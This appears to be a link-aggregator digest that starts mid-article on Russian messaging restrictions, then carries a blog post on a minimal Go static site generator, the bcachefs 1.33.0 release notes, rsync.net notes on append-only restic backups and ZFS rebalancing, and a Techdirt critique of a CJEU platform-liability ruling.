At the same time, authorities actively promoted a “national” messenger app called Max, which critics see as a surveillance tool. The platform, touted by developers and officials as a one-stop shop for messaging, online government services, making payments and more, openly declares it will share user data with authorities upon request. Experts also say it does not use end-to-end encryption.

Earlier this week, the government also said it was blocking Roblox, a popular online game platform, saying the step aimed at protecting children from illicit content and “pedophiles who meet minors directly in the game’s chats and then move on to real life”. Roblox in October was the second most popular game platform in Russia, with nearly 8 million monthly users, according to the media monitoring group Mediascope.

skip past newsletter promotion

Stanislav Seleznev, cyber security expert and lawyer with the Net Freedom rights group, said that Russian law views any platform where users can message each other as “organizers of dissemination of information”.

This label mandates that platforms have an account with Roskomnadzor so that it could communicate its demands, and give Russia’s security service, the FSB, access to accounts of their users for monitoring; those failing to comply are in violation and can get blocked, Seleznev said.

Seleznev estimated that possibly tens of millions of Russians have been using FaceTime, especially after calls were banned on WhatsApp and Telegram. He called the restrictions against the service “predictable” and warned that other sites failing to cooperate with Roskomnadzor “will be blocked – that’s obvious”.

][ Hello blog

Lobsters
nobloat.org
2025-12-04 20:42:13
Comments...
Original Article

I stumbled across the refactoring english book this summer. This got me motivated to try (technical) writing myself. However, I needed a simple way to publish blog posts and an excuse why I can't start writing immediatly. So me being in developer mode, I told myself:

"First things first, instead of practicing my writing, reading the book or sketching drafts of what I actually could write about, start with a custom static site generator."

But this now became the first article here on nobloat.org and I like it.

TL;DR

This blog is generated by 400 lines of handwritten go code , mainly because it is fun, but also because I was annoyed by all the breaking changes with each update of existing solutions.

This can't happen anymore :)

My mental image of writing
My mental image of writing

The static site generator ecosystem is vast , but most solutions come with significant complexity. From a writing perspective, the biggest issue was infact getting a setup that works without distraction and looks good to me .

Hugo is fast and popular and I have used it in the past already. But, it's a massive framework with hundreds of features I'd never use but still have to pay for in complexity tokens . The configuration files, theme system, and plugin ecosystem add layers of abstraction that make it hard to understand what's actually happening. When something breaks or I want to customize behavior, it is too complex for me to reason about all this. And I have had issues in the past where untouched static websites suddenly would no longer build after one or two years.

Jekyll requires Ruby, Bundler, and a complex gem ecosystem. Every time I'd want to update or deploy, I'd need to ensure the right Ruby version, manage gem dependencies, and deal with potential version conflicts. The overhead of maintaining a Ruby environment just to generate static HTML felt excessive. The same issue applies to Pelican just with Python instead of Ruby

Next.js and other React-based static site generators are powerful, but they bring the entire JavaScript ecosystem with them. Node modules, build tools, transpilation, and the constant churn of the npm ecosystem—all for what is essentially text processing and template rendering.

Even simpler tools like Zola or 11ty still require learning their specific conventions, configuration formats, and template languages. They're better than the heavyweights, but they're still frameworks with their own abstractions.

What I needed was:

  • write Markdown files
  • run a simple command, get HTML.
  • Everything should be in Git, work with text editors, and require no setup beyond having Go installed.
  • No configuration files, no theme system, no plugin architecture I would need to learn first.

None of the existing solutions met these requirements. They either required complex setup, had too many dependencies, introduced unnecessary abstractions, or were too opinionated about structure. Plus this might be a fun project for a sunny afternoon in the park.

Image of me in the park reading the refactoring english book
Image of me in the park reading the refactoring english book

The implementation consists of two Go files: main.go (core functionality) and data.go (site configuration), with no external dependencies beyond the standard library. It reads Markdown files, converts them to HTML, generates an index page, creates an RSS feed, and outputs everything to a public/ directory. The entire codebase is under 400 lines and does exactly what I need, nothing more.

How it works

The blog generator follows a simple workflow:

1. Content Structure

Posts are Markdown files in the articles/ directory, named with a date prefix: YYYY-MM-DD-title.md . The date prefix serves two purposes: it provides the publication date for sorting and RSS feeds, and it makes chronological organization obvious when browsing files.

articles/
  2025-07-01-hello-blog.md
  2025-12-03-x-platform-translation-system.md

The first line of each Markdown file is treated as the title (a # Heading ), and the rest is converted to HTML content.

2. Markdown to HTML conversion

The markdown parser is intentionally minimal. It handles:

  • Headings ( # , ## , ### )
  • Paragraphs
  • Lists ( - item )
  • Inline formatting ( bold , italic , code , links, images)
  • Code blocks with syntax highlighting classes
  • Automatic anchor generation for ## headings

The parser steps through each line of the markdown file and converts the supported expressions into HTML. For lists and code blocks it keeps track whether it is still inside a list or code snippet.

The code snippet is a bit shortened to only show the relevant parts.

func parseMarkdown(input string) (content string, title string) {
	lines := strings.Split(input, "\n")
	var out strings.Builder
	inList := false
	inCode := false
	codeLang := ""

	if len(lines) > 0 && strings.HasPrefix(lines[0], "# ") {
		title = strings.TrimPrefix(lines[0], "# ")
	}

	for _, raw := range lines {
		line := strings.TrimSpace(raw)
		if strings.HasPrefix(line, "```") {
			if inCode {
				out.WriteString("</code></pre>\n</div>\n")
				inCode = false
				continue
			}
			inCode = true
			codeLang = strings.TrimSpace(strings.TrimPrefix(line, "```"))
			if codeLang == "" {
				out.WriteString("<pre><code>")
			} else {
				out.WriteString(fmt.Sprintf("<pre><code class=\"language-%s\">", codeLang))
			}
			continue
		}
		if inCode {
			out.WriteString(html.EscapeString(raw) + "\n")
			continue
		}
		if inList && line == "" {
			out.WriteString("</ul>\n")
			inList = false
			continue
		}
		switch {
		case strings.HasPrefix(line, "> "):
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
			quote := formatInline(strings.TrimPrefix(line, "> "))
			out.WriteString("<blockquote><p>" + quote + "</p></blockquote>\n")
		case strings.HasPrefix(line, "# "):
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
			heading := formatInline(strings.TrimPrefix(line, "# "))
			out.WriteString("<h1>" + heading  + "</h1>\n")
		case strings.HasPrefix(line, "- "):
			if !inList {
				out.WriteString("<ul>\n")
				inList = true
			}
			item := formatInline(strings.TrimPrefix(line, "- "))
			out.WriteString("<li>" + item + "</li>\n")
		case line == "":
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
		default:
			if inList {
				out.WriteString("</ul>\n")
				inList = false
			}
			out.WriteString("<p>" + formatInline(line) + "</p>\n")
		}
	}

	if inList {
		out.WriteString("</ul>\n")
	}
	if inCode {
		out.WriteString("</code></pre>\n</div>\n")
	}

	return out.String(), title
}

3. Post Loading and Sorting

The loadPosts() function scans the articles directory, reads each .md file, parses the date from the filename prefix, converts Markdown to HTML, and sorts posts by date in descending order (newest first).

func loadPosts(dir string) []Post {
    files, _ := os.ReadDir(dir)
    var posts []Post
    for _, f := range files {
        if strings.HasSuffix(f.Name(), ".md") {
            // Parse date from filename: YYYY-MM-DD-title.md
            dateStr := f.Name()[:10]
            postDate, err := time.Parse("2006-01-02", dateStr)
            // Convert markdown to HTML
        }
    }
    // Sort by date, newest first
    sort.Slice(posts, func(i, j int) bool {
        return posts[i].Date.After(posts[j].Date)
    })
    return posts
}

If a file doesn't match the expected format, it logs a warning and skips it, ensuring only properly formatted posts are included.

4. HTML and RSS Feed Generation

The generator creates three types of HTML:

Index Page ( index.html ): Lists all posts with links, plus a links section for external resources.

Post Pages ( YYYY-MM-DD-title.html ): Individual post pages with navigation back to the index.

RSS Feed ( feed.xml ): Standard Atom feed for RSS readers.

All HTML is generated using Go's html/template package, which is part of the standard library. Templates are read from simple HTML files ( index.html and article.html ) that use Go's template syntax—no complex template system, just straightforward HTML with template variables.

5. Configuration

Site metadata is stored in data.go as a simple Go struct. This includes the site title, slogan, base URL, links, projects, and tools that appear on the index page. The configuration is just a variable declaration, hence no YAML, no JSON, no complex config parsing.

To change the site title or add a link, I just edit data.go directly.

var config = Config{
    Title:   "][ nobloat.org",
    Slogan:  "pragmatic software minimalism",
    BaseURL: "https://nobloat.org",
    Links: map[string]string{
        "Choosing boring technology": "https://boringtechnology.club/",
        // ...
    },
    // ...
}

6. File Watching (Optional)

For development, the main.go includes a --watch flag that uses the fsnotify package to monitor the articles directory, CSS file, template files, and the generator itself. When any file changes, it automatically rebuilds the site.

When you modify content, templates, or CSS, changes are detected immediately and the site rebuilds automatically. Edit a post, see it update. Modify the HTML templates, get instant feedback. Change the stylesheet, see the new styles applied.

It does however not detect changes to the *.go files itself, because it would require a little more complex restart mechanism and I rarely touch them anyway.

This is the only external dependency ( github.com/fsnotify/fsnotify ), and it's only needed for the watch feature. The core build functionality requires no external packages.

Conclusion

This blog generator does exactly what I need: converts Markdown to HTML, generates an index and RSS feed, and outputs static files. It's under 400 lines of code , uses only the go standard library for core functionality, and I understand every part of it.

It might not be suitable for someone who needs complex features like tags, categories, pagination, or theme systems. But for a simple blog, it's perfect. It fits the "nobloat" philosophy .

The entire codebase is very small, making it easy to read, modify, and maintain.

And the best part for me personally: I don't need node , npm or similar tools to build this. Local preview is just opening the public/index.html in firefox . Deployment is just an

rsync -av --delete public/ user@host:html/blog/

I do have a few ideas of further topics to write about the context of nobloat . Taking the courage to publish this was the biggest step for me.

References

Feeback is always welcome to dev@spiessknafl.at

Fairphone open-sources Fairphone 5 and 6 software, and Moments switch

Lobsters
www.fairphone.com
2025-12-04 20:41:13
Comments...

bcachefs 1.33.0 - reconcile

Lobsters
lore.kernel.org
2025-12-04 20:04:42
Comments...
Original Article
From: Kent Overstreet <kent.overstreet@linux.dev>
To: linux-bcachefs@vger.kernel.org
Subject: bcachefs 1.33.0 - reconcile
Date: Thu, 4 Dec 2025 12:35:59 -0500	[thread overview]
Message-ID: <slvis5ybvo7ch3vxh5yb6turapyq7hai2tddwjriicfxqivnpn@xdpb25wey5xd> (raw)

Biggest new feature in the past ~2 years, I believe. The user facing
stuff may be short and sweet - but so much going on under the hood to
make all this smooth and polished.

Big thank you to everyone who helped out with testing, design feedback,
and more.

As always, keep the bug reports coming - you find 'em, we fix em :)

Cheers,
Kent


Changelog:
==========

`bcachefs_metadata_version_reconcile` (formerly known as rebalance_v2)

### Reconcile

An incompatible upgrade is required to enable reconcile.

Reconcile now handles all IO path options; previously only the background target
and background compression options were handled.

Reconcile can now process metadata (moving it to the correct target,
rereplicating degraded metadata); previously rebalance was only able to handle
user data.

Reconcile now automatically reacts to option changes and device setting
changes, and immediately rereplicates degraded data or metadata

This obsoletes the commands `data rereplicate`, `data job
drop_extra_replicas`, and others; the new commands are `reconcile status` and
`reconcile wait`.

The recovery pass `check_reconcile_work` now checks that data matches the
specified IO path options, and flags an error if it does not (if it wasn't due
to an option change that hasn't yet been propagated).

Additional improvements over rebalance and implementation notes:

We now have a separate index for data that's scheduled to be processed by
reconcile but can't (e.g. because the specified target is full),
`BTREE_ID_reconcile_pending`; this solves long standing reports of rebalance
spinning when a filesystem has more data than fits on the specified background
target.

This also means you can create a single device filesystem with replicas=2, and
upon adding a new device data will automatically be replicated on the new
device, no additional user intervention required.

There's a separate index for "high priority" reconcile processing -
`BTREE_ID_reconcile_hipri`. This is used for degraded extents that need to be
rereplicated; they'll be processed ahead of other work.

Rotating disks get special handling. We now track whether a disk is rotational
(a hard drive, instead of an SSD); pending work on those disks is additionally
indexed in the `BTREE_ID_reconcile_work_phys` and
`BTREE_ID_reconcile_hipri_phys` btrees so they can be processed in physical
LBA order, not logical key order, avoiding unnecessary seeks.

We don't yet have the ability to change the rotational setting on an existing
device, once it's been set; if you discover you need this, please let us know so
it can be bumped up on the list (it'll be a medium sized project).

`BCH_MEMBER_STATE_failed` has been renamed to `BCH_MEMBER_STATE_evacuating`;
as the name implies, reconcile automatically moves data off of devices in the
evacuating state. In the future, when we have better tracking and monitoring
of drive health, we'll be able to automatically mark failing devices as
evacuating: when this lands, you'll be able to load up a server with disks and
walk away - come back a year later to swap out the ones that have been failed.

Reconcile was a massive project: the short and simple user interface is
deceptive, there was an enormous amount of work under the hood to make
everything work consistently and handle all the special cases we've learned
about over the past few years with rebalance.

There's still reconcile-related work to be done on disk space accounting when
devices are read-only or evacuating, and in the future we want to reserve space
up front on option change, so that we can alert the user if they might be doing
something they don't have disk space for.

### Other improvements and changes:

- Degraded data is now always properly reported as degraded (by `bcachefs fs
  usage`); data is considered degraded any time the durability on good
  (non-evacuating devices) is less than the specified replication level.

- Counters (shown by `bcachefs fs top` and tracepoints have gotten a giant
  cleanup and rework: every counter has a corresponding tracepoint. This makes
  it easy to drill down and investigate when a filesystem is doing something
  unusual and unexpected.

  Under the hood, the conversion of tracepoints to printbufs/pretty printers has
  now been completed, with some much improved helpers. This makes it much easier
  to add new counters and tracepoints or add additional info to existing
  tracepoints, typically a 5-20 line patch. If there's something you're
  investigating and you need more info, just ask.

  We now make use of type information on counters to display data rates in
  `bcachefs fs top` where applicable, and many counters have been converted to
  data rates. This makes it much easier to correlate different counters (e.g.
  `data_update`, `data_update_fail`) to check if the rates of slowpath events
  should be a cause for concern.

- Logging/error message improvements

  Logging has been a major area of focus, with a lot of under the hood
  improvements to make it ergonomic to generate messages that clearly explain
  what the system is doing an why: error messages should not include just the
  error, but how it was handled (soft error or hard error) and all actions taken
  to correct the error (e.g. scheduling self healing or recovery passes).

  When we receive an IO error from the block layer we now report the specific
  error code we received (e.g. `BLK_STS_IOERR`, `BLK_STS_INVAL`).

  The various write paths (user data, btree, journal) now report one error
  message for the entire operation that includes all the sub-errors for the
  individual replicated writes and the status of the overall operation (soft
  error (wrote degraded data) vs. hard error), like the read paths.

  On failure to mount due to insufficient devices, we now report which device(s)
  were missing; we remember the device name and model in the superblock from the
  last time we saw it so that we can give helpful hints to the user about what's
  missing.

  When btree topology repair recovers via btree node scan, we now report which
  node(s) it was able to recover via scan; this helps with determining if data
  was actually lost or not.

  We now ratelimit soft and hard errors separately, in the data/journal/btree
  read and write paths, ensuring that if the system is being flooded with soft
  errors the hard errors will still be reported.

  All error ratelimiting now obeys the `no_ratelimit_errors` option.

  All recovery passes should now have progress indicators.

- New options:

  `mount_trusts_udev`: there have been reports of mounting by UUID failing due
  to known bugs in libblkid. Previously this was available as an environment
  variable, but it now may be specified as a mount option (where it should also
  be much easier to find). When specified, we only use udev for getting the list
  of the system's block devices; we do all the probing for filesystem members
  ourself.

  `writeback_timeout`: if set, this overrides the `vm.dirty_writeback*` sysctls
  for the given filesystem, and may be set persistently. Useful for setting a
  lower writeback timeout for removeable media.

- Other smaller user-visible improvements

  The `mi_btree_bitmap` field in the member info section of the superblock now
  has a recovery pass to clean it up and shrink it; it will be automatically
  scheduled when we notice that there is significantly more space on a device
  marked as containing metadata than we have metadata on that device.

  The member-info btree bitmap is used by btree node scan, for disaster recovery
  repair; shrinking the bitmap reduces the amount of the device that has to be
  scanned if we have to recover from btree nodes that have become unreadable or
  lost despite replication. You don't ever want to need it, but if you do need
  it it's there.

- Promotes are now ratelimited; this resolves an issue with spinning up far too
  many kworker threads for promotes that wouldn't happen due to the target being
  busy.

- An issue was spotted on a user filesystem where btree node merging wasn't
  happening properly on the `reconcile_work` btree, causing a very slow upgrade.
  Btree node merging has now seen some improvements; btree lookups can now kick
  off asynchronous btree node merges when they spot an empty btree node, and the
  btree write buffer now does btree merging asynchronously, which should be a
  noticeable improvement on system performance under heavy load for some users -
  btree write buffer flushing is single threaded and can be a bottleneck.

  There's also a new recovery pass, `merge_btree_nodes`, to check all btrees for
  nodes that can be merged. It's not run automatically, but can be run if
  desired by passing the `recovery_passes` option to an online fsck.

- And many other bug fixes.

### Notable under-the-hood codebase work:

A lot of codebase modernization has been happening over the past six months,
to prepare for Rust. With the latest features recently available in C and in
the kernel, we can now do incremental refactorings to bring code steadily more
in line with what the Rust version will be, so that the future conversion will
be mostly syntactic - and not a rewrite. The big enabler here was CLASS(),
which is the kernel's version of pseudo-RAII based on `__cleanup()`; this
allows for the removal of goto based error handling (Rust notably does not
have goto).

We're now down to ~600 gotos in the entire codebase, down from ~2500 when the
modernization started, with many files being complete.

Other work includes avoiding open coded vectors; bcachefs uses DARRAY(), which
is decently close to Rust/C++ vectors, and the try() macro for forwarding
errors, stolen from Rust. These cleanups have deleted thousands of lines from
the codebase over the past months.

                 reply	other threads:[~2025-12-04 17:36 UTC|newest]

Thread overview: [no followups] expand[flat|nested]  mbox.gz  Atom feed

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=slvis5ybvo7ch3vxh5yb6turapyq7hai2tddwjriicfxqivnpn@xdpb25wey5xd \
    --to=kent.overstreet@linux.dev \
    --cc=linux-bcachefs@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

rsync.net technical notes Q4

Lobsters
www.rsync.net
2025-12-04 19:58:39
Comments...
Original Article

Technical Notes - Q4 2025

Append-Only backups with rclone serve restic --stdio ... ZFS vdev rebalancing ... borg mount example
(Discussion Thread at HackerNews)

Append-Only Backups with rclone serve restic --stdio

rsync.net users may run unix commands, remotely, over SSH like this:

ssh user@rsync.net md5 some/file

or:

ssh user@rsync.net rm -rf some/file

There is a restricted set of commands that are able to be run and because customer filesystems are mounted noexec,nosuid it is not possible to run commands that customers upload.

However, as an added defense, we also have an arguments firewall wherein we explicitly allow only specific arguments to be specified for each allowed command.

Since the inclusion of the 'rclone' command on our platform we have very intentionally disallowed the "serve" argument as we have no intention of allowing customers to run persistent processes or open sockets, answer other protocols, etc.

However ...

A number of customers, most notably Michael Alyn Miller, pointed out that the 'rclone serve restic' workflow has a --stdio modifier that causes the "serve" functions to happen over stdio without opening network sockets or spawning server processes, etc., and enables this very particular command to be run:

rclone serve restic --stdio

... which is interesting because this gives us an encrypted "append only" workflow using restic ... which is built into rclone ... which is built into our platform[1].

This is accomplished by creating a specific SSH key just for these append-only backups . This key is placed in the ~/.ssh/authorized_keys file inside your rsync.net account with a command restriction:

restrict,command="rclone serve restic --stdio --append-only path/path/repo" ssh-ed25519 JHWGSFDEaC1lZDIUUBVVSSDAIE1P3GjIRpxxFjjsww2nx3mcnwwebwLk ....

... which means that logins occurring with that SSH key may not run any other command than this very specific one that not only specifies --append-only but the specific repository to work on.

You will also need to create a second SSH key with no command restrictions - you'll see why as we continue below ...

On the client end (your end) you would perform an append-only backup like this:

First, initialize a restic repository in your rsync.net account using the normal SSH key that has no command restrictions :

restic -r sftp:user@rsync.net:path/repo init

enter password for new repository:
enter password again:
Enter passphrase for key '/home/user/.ssh/admin_key':
created restic repository 149666wedd at sftp:user@rsync.net:path/repo

Please note that knowledge of your password is required to access the repository. Losing your password means that your data is irrecoverably lost.

Second, perform a backup of /YOUR/SOURCE/DATA to this newly initialized repository:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA

enter password for repository:
repository 149666wedd opened successfully, password is correct
created new cache in path/repo/.cache/restic
no parent snapshot found, will read all files
Files:        2112 new,     0 changed,     0 unmodified
Dirs:          303 new,     0 changed,     0 unmodified
Added to the repo: 869.197 MiB

processed 2114 files, 1600.575 MiB in 1:01
snapshot dnn0629f saved

You now have your first snapshot. Let's add a file, change some files, delete a file, and then do another backup:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA

enter password for repository:
repository 149666wedd opened successfully, password is correct
using parent snapshot dnn0629f

Files:           1 new,     1 changed,  2110 unmodified
Dirs:            0 new,     3 changed,    82 unmodified
Added to the repo: 615.911 MiB

processed 2114 files, 1.160 GiB in 0:01
snapshot a39b6628 saved

We have created a repository, uploaded data to it, and refreshed it with new data.

Now let's verify that we can see the snapshots we've created:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo list snapshots

enter password for repository:
repository 149666wedd opened successfully, password is correct
ijnssb337c4423013b69ed833fc5514ca010160nbss223h95122fcb22h361tt7
snBSGw23hBBSj2k23d055723b2336caajsnnww23b3cc16cf88838f085bbww1kv

Finally, let's prove to ourselves that the repository is, indeed, append-only:

restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo forget --keep-last 1

repository 149666wedd opened successfully, password is correct
Applying Policy: keep 1 latest snapshots
keep 1 snapshots:
ID        Time                 Host        Tags        Reasons Paths
-----------------------------------------------------------------------------------------
a39b6628  2025-03-29 20:10:44  hostname                last snapshot /YOUR/SOURCE/DATA
-----------------------------------------------------------------------------------------
1 snapshots

remove 1 snapshots:
ID        Time                 Host        Tags        Paths
--------------------------------------------------------------------------
dnn0629f  2025-03-29 20:09:54  hostname                /YOUR/SOURCE/DATA
--------------------------------------------------------------------------
1 snapshots

Remove() returned error, retrying after 720.254544ms: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 873.42004ms: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 1.054928461s: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 1.560325776s: blob not removed, server response: 403 Forbidden (403)
Remove() returned error, retrying after 3.004145903s: blob not removed, server response: 403 Forbidden (403)
 signal interrupt received, cleaning up
unable to remove  from the repository
[0:04] 0.00%  0 / 1 files deleted

What we have accomplished is a remote, encrypted backup (using restic) that can only be accessed by one of two SSH keys - a "normal" SSH key that has full control over the rsync.net account and can read/write/delete arbitrarily and a second "append-only" SSH key that cannot do anything at all except call rclone, specifically to run restic, and even more specifically in append-only mode .

This arrangement only makes sense if you keep the "normal" SSH key out of, and way from, whatever system is running these automated backups. The system that runs the backups should only have the append-only key. This way, if an attacker gains control of the source system they cannot abuse the backup configuration to destroy your remote backups at rsync.net.

[1] The restic binary is not installed on our platform and the correct way for rsync.net users to use "plain old restic" is to run it over SFTP with their rsync.net account as the SFTP endpoint.

ZFS vdev rebalancing

Let's pretend that you have a zpool with four vdevs, each of which are 90% full.

If you add a fifth vdev to this zpool, ZFS will tend to balance all new writes across all five vdevs which is a strategy that maximizes performance.

Unfortunately, if you continue to write data to this pool the first four vdevs will eventually reach 95 - 96 percent full, while the new, fifth vdev is only 5-6% full, and switch allocation strategies to "best fit" and start writing most (almost all) writes to only the new vdev.

Which is to say: your 5-vdev pool will have increased performance due to the addition of the 5th vdev for only a very short time. After that, performance will degrade markedly as you write to only the new vdev. The original four vdevs are effectively full.

One way to manage this scenario is to set a write threshold with this sysctl:

vfs.zfs.mg.noalloc_threshold

... and copy data from this zpool to itself .

For instance:

Wait for a period of light (or no) activity when you know you will be the only one writing any significant data to the pool.

Set the 'vfs.zfs.mg.noalloc_threshold' sysctl to something just above the percentage full of your existing vdevs ... in this case, if the existing vdevs are 90% full, we will attempt to grow them by 2% each, and so we will set the sysctl to '8':

# sysctl -w vfs.zfs.mg.noalloc_threshold=8

... which means that at 8% free (92% full) these vdevs will stop accepting new written data.

Now find 10 TB of data on this zpool to copy (not move) back to itself.

(or, alternatively, find a 10TB dataset to 'zfs send' back to itself)

When this 10 TB of data is written to the pool it will be distributed evenly across all five vdevs.

Further, when you delete the source data (or dataset) you will be removing 2.5TB of data from each of the original vdevs which was replaced with only 2TB.

All future reads and writes of this data will now occur from five vdevs rather than four, thus increasing performance. You are, effectively, defragmenting the pool.

In this hypothetical situation our four original vdevs are now 89.5% full which means you could leave the sysctl set at '8' but this time choose a 12.5TB dataset or collection of files and copy/send that back to itself.

The condition we are trying to avoid is one where our rebalancing of data, along with other variables - or activity - on the system causes one of the existing vdevs to fill up to 95-96% at which time it will effectively stop accepting new writes.

By locking the fullness threshold with this sysctl, we can make sure we are rebalancing onto all five vdevs evenly and not overloading any one of them.

If you repeat the above procedure a few times you will achieve a manually rebalanced - and defragmented - zpool. New data will tend to write across all five vdevs and all of the data that you manually rebalanced will be newly spread across all five vdevs.

borg mount syntax

You can remotely mount a borg repo stored in your rsync.net account to a local mountpoint:

borg mount --remote-path=borg14 user@rsync.net:path/path/repo/ /mnt/borg

This will mount the remote borg repository, locally, in /mnt/borg. It will be mounted as a borgfs device of type "fuse".

This borg mount is read-only by default.

This HOWTO has some interesting workflows for 'borg mount' like mounting multiple repositories with a 'for' loop and 'diff'ing different mounted repositories, etc.

More Information

rsync.net publishes a wide array of support documents as well as a FAQ

rsync.net has been tested, reviewed and discussed in a variety of venues .

You, or your CEO, may find our CEO Page useful.

Please see our HIPAA , GDPR , and Sarbanes-Oxley compliance statements.

Contact info@rsync.net for more information, and answers to your questions.

Click here for Simple Pricing - Or call 619-819-9156 or email info@rsync.net for more information.

CJEU has made it effectively impossible to run a user-generated platform legally

Hacker News
www.techdirt.com
2025-12-04 19:55:04
Comments...
Original Article

from the seems-like-a-problem dept

The Court of Justice of the EU—likely without realizing it—just completely shit the bed and made it effectively impossible to run any website in the entirety of the EU that hosts user-generated content.

Obviously, for decades now, we’ve been talking about issues related to intermediary liability, and what standards are appropriate there. I am an unabashed supporter of the US’s approach with Section 230, as it was initially interpreted, which said that any liability should land on the party who contributed the actual violative behavior—in nearly all cases the speaker , not the host of the content.

The EU has always held itself to a lower standard of intermediary liability, first with the E-Commerce Directive and more recently with the Digital Services Act (DSA), which still generally tries to put more liability on the speaker but has some ways of shifting the liability to the platform.

No matter which of those approaches you think is preferable, I don’t think anyone could (or should) favor what the Court of Justice of the EU came down with earlier this week, which is basically “fuck all this shit, if there’s any content at all on your site that includes personal data of someone you may be liable.”

As with so many legal clusterfucks, this one stems from a case with bad facts, which then leads to bad law. You can read the summary as the CJEU puts it:

The applicant in the main proceedings claims that, on 1 August 2018, an unidentified third party published on that website an untrue and harmful advertisement presenting her as offering sexual services. That advertisement contained photographs of that applicant, which had been used without her consent, along with her telephone number. The advertisement was subsequently reproduced identically on other websites containing advertising content, where it was posted online with the indication of the original source. When contacted by the applicant in the main proceedings, Russmedia Digital removed the advertisement from its website less than one hour after receiving that request. The same advertisement nevertheless remains available on other websites which have reproduced it.

And, yes, no one is denying that this absolutely sucks for the victim in this case. But if there’s any legal recourse, it seems like it should be on whoever created and posted that fake ad. Instead, the CJEU finds that Russmedia is liable for it, even though they responded within an hour and took down the ad as soon as they found out about it.

The lower courts went back and forth on this, with a Romanian tribunal (on first appeal) finding, properly, that there’s no fucking way Russmedia should be held liable, seeing as it was merely hosting the ad and had nothing to do with its creation:

The Tribunalul Specializat Cluj (Specialised Court, Cluj, Romania) upheld that appeal, holding that the action brought by the applicant in the main proceedings was unfounded, since the advertisement at issue in the main proceedings did not originate from Russmedia, which merely provided a hosting service for that advertisement, without being actively involved in its content. Accordingly, the exemption from liability provided for in Article 14(1)(b) of Law No 365/2002 would be applicable to it. As regards the processing of personal data, that court held that an information society services provider was not required to check the information which it transmits or actively to seek data relating to apparently unlawful activities or information. In that regard, it held that Russmedia could not be criticised for failing to take measures to prevent the online distribution of the defamatory advertisement at issue in the main proceedings, given that it had rapidly removed that advertisement at the request of the applicant in the main proceedings.

With the case sent up to the CJEU, things get totally twisted, as they argue that under the GDPR, the inclusion of “sensitive personal data” in the ad suddenly makes the host a “joint controller” of the data under that law. As a controller of data, the much stricter GDPR rules on data protection now apply, and the more careful calibration of intermediary liability rules get tossed right out the window.

And out the window, right with it, is the ability to have a functioning open internet.

The court basically shreds basic intermediary liability principles here:

In any event, the operator of an online marketplace cannot avoid its liability, as controller of personal data, on the ground that it has not itself determined the content of the advertisement at issue published on that marketplace. Indeed, to exclude such an operator from the definition of ‘controller’ on that ground alone would be contrary not only to the clear wording, but also the objective, of Article 4(7) of the GDPR, which is to ensure effective and complete protection of data subjects by means of a broad definition of the concept of ‘controller’.

Under this ruling, it appears that any website that hosts any user-generated content can be strictly liable if any of that content contains “sensitive personal data” about any person. But how the fuck are they supposed to handle that?

The basic answer is to pre-scan any user-generated content for anything that might later be deemed to be sensitive personal data and make sure it doesn’t get posted.

How would a platform do that?

¯\_(ツ)_/¯

There is no way that this is even remotely possible for any platform, no matter how large or how small. And it’s even worse than that. As intermediary liability expert Daphne Keller explains :

The Court said the host has to

  • pre-check posts (i.e. do general monitoring)
  • know who the posting user is (i.e. no anonymous speech)
  • try to make sure the posts don’t get copied by third parties (um, like web search engines??)

Basically, all three of those are effectively impossible.

Think about what the court is actually demanding here. Pre-checking posts means full-scale automated surveillance of every piece of content before it goes live—not just scanning for known CSAM hashes or obvious spam, but making subjective legal determinations about what constitutes “sensitive personal data” under the GDPR. Requiring user identification kills anonymity entirely, which is its own massive speech issue. And somehow preventing third parties from copying content? That’s not even a technical problem—it’s a “how do you stop the internet from working like the internet” problem.

Some people have said that this ruling isn’t so bad, because the ruling is about advertisements and because it’s talking about “sensitive personal data.” But it’s difficult to see how either of those things limit this ruling at all.

There’s nothing inherently in the law or the ruling that limits its conclusions to “advertisements.” The same underlying factors would apply to any third party content on any website that is subject to the GDPR.

As for the “sensitive personal data” part, that makes little difference because sites will have to scan all content before anything is posted to guarantee no “sensitive personal data” is included and then accurately determine what a court might later deem to be such sensitive personal data. That means it’s highly likely that any website that tries to comply under this ruling will block a ton of content on the off chance that maybe that content will be deemed sensitive.

As the court noted:

In accordance with Article 5(1)(a) of the GDPR, personal data are to be processed lawfully, fairly and in a transparent manner in relation to the data subject. Article 5(1)(d) of the GDPR adds that personal data processed must be accurate and, where necessary, kept up to date. Thus, every reasonable step must be taken to ensure that personal data that are inaccurate, having regard to the purposes for which they are processed, are erased or rectified without delay. Article 5(1)(f) of that regulation provides that personal data must be processed in a manner that ensures appropriate security of those data, including protection against unauthorised or unlawful processing.

Good luck figuring out how to do that with third-party content.

And they’re pretty clear that every website must pre-scan every bit of content. They claim it’s about “marketplaces” and “advertisements” but there’s nothing in the GDPR that limits this ruling to those categories:

